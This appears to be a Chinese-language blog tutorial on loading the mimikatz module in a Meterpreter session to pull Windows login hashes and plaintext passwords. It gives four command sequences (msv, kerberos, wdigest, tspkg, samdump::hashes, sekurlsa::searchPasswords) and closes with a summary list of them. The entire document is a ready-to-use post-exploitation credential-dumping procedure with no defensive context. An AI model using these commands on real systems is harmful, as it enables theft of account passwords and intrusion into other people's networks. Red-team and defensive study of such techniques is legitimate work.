meterpreter中使用mimikatz擷取windows密碼

進去meterpreter後getuid一下

這獲得系統管理者權限

開始

加載mimikatz子產品

load mimikatz
           

加載成功.

第一種方法：

擷取登入密碼的hash值

msv
           

上面已經是得到hash值了. 下面算明文密碼.

擷取明文密碼

kerberos
           

look...拿到登入的明文密碼了.

第二種方法：

使用另一種方式擷取哈希值

mimikatz_command -f samdump::hashes
           

根據上面的方式擷取明文密碼

mimikatz_command -f sekurlsa::searchPasswords
           

第三種方法：

Wdigest指令

這個指令呢, 沒有上面的複雜,加載子產品後直接調用這個wdigest.

wdigest
           

第四種方法：

tspkg指令

tspkg
           

總結

一、
load mimikatz #加載mimikatz
msv #擷取hash值
kerberos #擷取明文

二、
load mimikatz #加載mimikatz
wdigest #擷取系統賬戶資訊

三、
load mimikatz #加載mimikatz
tspkg #擷取系統賬戶資訊

四、
load mimikatz #加載mimikatz
mimikatz_command -f samdump::hashes
mimikatz_command -f sekurlsa::searchPasswords